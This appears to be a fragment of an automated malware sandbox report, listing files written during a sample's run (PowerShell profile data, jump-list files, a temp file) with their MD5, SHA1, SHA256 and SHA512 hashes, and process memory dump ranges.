C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f227fa0b699f9a30db777271d1d24f1 |
| SHA1 | 3264aba29af8868dd0638dd5bd0791d9234012dc |
| SHA256 | b5fca526f30753b464b1fc9fcf0d0b85feaa066abdfaab39f9b6bc2d6d58a3e6 |
| SHA512 | 44ded679e98d87babf6c45d3e416b0de4c1e154ffbc65fd66f5ef1611a1f67885d59328d16465f1e7593e378b08f4e19ee726cffcc583e9e0cd9c38fc0b0a2d1 |
memory/1652-628-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cd7c17f88c831f133c7b4f69214b971d |
| SHA1 | 74ee672bf7f1f82aa1a6e2f97918188db4095031 |
| SHA256 | 6c33cbe8ca57db846ae05ded5a541281f7b93917838cfb0896a093657ede3f9c |
| SHA512 | 6d44c1b01117712f7b90eb7d8104dd3ff18d96befb3b8e859b791dcf1ab33448fb8b17d812ee100eeb15aa240fa2d0ee305e1cf2f9f9871757577e43eb1fc1be |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2890ccc4a5f62dfbb712701c0b15566 |
| SHA1 | 42cfdbd467e7f6665da0e38055cd02bef973d5c0 |
| SHA256 | ce8f9b5b853bd88e4560a475ab1800940b62a91e5fb21dc7955ff6002579e006 |
| SHA512 | 31ec98a857e23366c57624bab975d229e9edecec4a423472238655c03c42e9e834e7651e9cba99dd9186eac9c230e144d378c1817b0ca5670bd8a1bd92124eaa |
memory/1652-648-0x0000000000400000-0x0000000000AE1000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 00f43f6ee252f527ee4f93e1a153ba5a |
| SHA1 | 02098a5788d515e06d41b37c7893753db7309b66 |
| SHA256 | f6506a79fdba77fc3af7777447731a9503bbc13a40349f98156ab59ed40fd44f |
| SHA512 | 5548d87e9921de7b1b4b3707a2ab68235ae5ed111388b15c7e5373fa44bd40d7e5d645cb359bf370505e850f81995b1e93463f3f63c9109e9e0103358848aed4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e85d9d47c769b86cd63263419377ed3b |
| SHA1 | 50603fc5ba76d063dd51bb6e0925c7ef1ac4856e |
| SHA256 | e0abe9dfc1fe7715dc7af44328101cdde53eea6fa2d7ddea86b207aa08e13ccf |
| SHA512 | 842f602768ee97c2cd8e9ecfcdacc8a39b628a6c3955356b49aaa3e3876c56614ab218e83ddf5febef6df050ace56a43d20e659abf7db0740abac52701713b3f |
memory/1652-667-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 07f50ad89de1053a40aa7bcd9a24bb16 |
| SHA1 | fd8530ca057122e00925d92456416d166844332f |
| SHA256 | 9c87c985dfcf8aabba1b7d0264dd74e6e9e768a0c32a1aeb758da0881221bb0f |
| SHA512 | 15bb33383ae9b8da98361b5935d9eb9d73e5c758ee732bbc06be909d373f84430ce2d623dc01de2b137bbdcdc63d314ba8582301758339861a9c8454936122af |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c0001970190d40af53b35d4f3fda448a |
| SHA1 | c57ae00b05a0cb5a31c608512aa95bdef41812d6 |
| SHA256 | d47e56764438739c42bc2e66459361689c90058410e38aa4663ee844f80ebe7d |
| SHA512 | 85ba632c69d423ad17bd92496ecdb4abc27a7ba33f37dd396e8bc98efe2e5fce6a666795a1511c542636ca12fae53f045dc78a4744aeca70e9e6f061dc6dbcfb |
C:\Users\Admin\AppData\Local\Temp\5k7wtl346v6wd4ynfi3pq16l.tmp
| MD5 | e30303afaeadd63c785bd24e6f4af702 |
| SHA1 | 2d0117bc4c64c5b6f0ec56bc9919e464e0a9a8af |
| SHA256 | 304647d8a0c26749d9245eb3368ebade3446d24f785d68f9da2f704170320c93 |
| SHA512 | ea7c2fbdf923dec61ff31ea81c9d93a425ae59fe2f11ea1a25a3ecc1c9bef05e8de15289e1fce66ff84fe25015653720b22a3e0c9276d22ff09c1626d69ace89 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 31c4df6037c5bb4dc05fbb21f0054508 |
| SHA1 | 7982875dc74a80687774fb62b0b8630535c7e1b8 |
| SHA256 | 9fa251093183b802621f16e087a7477872774d23b15649c209938f6e84f2da17 |
| SHA512 | ff8b296256201a667226037955df783d27479601327caa70289b846e002d9d49ecbea1b3825861f29c4516822c93b0d5a609eba6818f9066cbf138b5ffae690c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6d0c0f9b29ea68650ace0a22bf21f77 |
| SHA1 | 8946a2a457da62f931af376747949a6edfe50b70 |
| SHA256 | 7e98fe4a9201bd143b75e02480a407e00a386b60f699dbe99ec05edb1ba32ae3 |
| SHA512 | 84eb2599a6471b31f85247a608287e650f7119588a7a0b5a39bd4c0f4afdb38b6d0e592cdd1f45e78146bbc659bc9ad53ff885451524438faa579df038af056f |
memory/1652-705-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7dc5cd39935215be5eb4974236e481bf |
| SHA1 | a84c06b6ca74cb68273260d312116dc8bba10f6f |
| SHA256 | 4d932ffd928ee3bc41c009dd984c773d92ece08c3479f9b41c293c8298f00467 |
| SHA512 | 614166194bc2326b3d95cce805a19c3c7b129cc4a0227b7094b5176aac4dc4633c08c8ef5918d22230331c4f62a9fc7faff0b4628719ebd855b88034fa8c8303 |
memory/1652-726-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b2b82da57c43752d2c00853247c7b8f8 |
| SHA1 | 76fc5b56f7e27f81ae62c91228c277c9db399493 |
| SHA256 | bd8c81994944b668288e5622b2951c5d98d06ba8da83928d416c5c52ab318510 |
| SHA512 | 1e7e4b6818350dd1bd953ddaa6732f177b48bad97a77e684ccc43bb7ef627f8792b1964ca2aab1c7d1994e372fc1c08784df022eae312f1476be54571b845d0d |
memory/1652-746-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-752-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-754-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/4160-767-0x0000000003440000-0x0000000003476000-memory.dmp
memory/4160-768-0x0000000005C10000-0x00000000062DA000-memory.dmp
memory/4160-769-0x0000000005A70000-0x0000000005A92000-memory.dmp
memory/4160-770-0x0000000005B10000-0x0000000005B76000-memory.dmp
memory/4160-771-0x00000000062E0000-0x0000000006346000-memory.dmp
memory/4160-781-0x0000000006350000-0x00000000066A7000-memory.dmp
memory/4160-782-0x00000000068B0000-0x00000000068CE000-memory.dmp
memory/4160-783-0x0000000006940000-0x000000000698C000-memory.dmp
memory/1652-784-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/4160-785-0x0000000007A80000-0x0000000007B16000-memory.dmp
memory/4160-786-0x0000000006DA0000-0x0000000006DBA000-memory.dmp
memory/4160-787-0x0000000006E10000-0x0000000006E32000-memory.dmp
memory/4160-788-0x00000000080D0000-0x0000000008676000-memory.dmp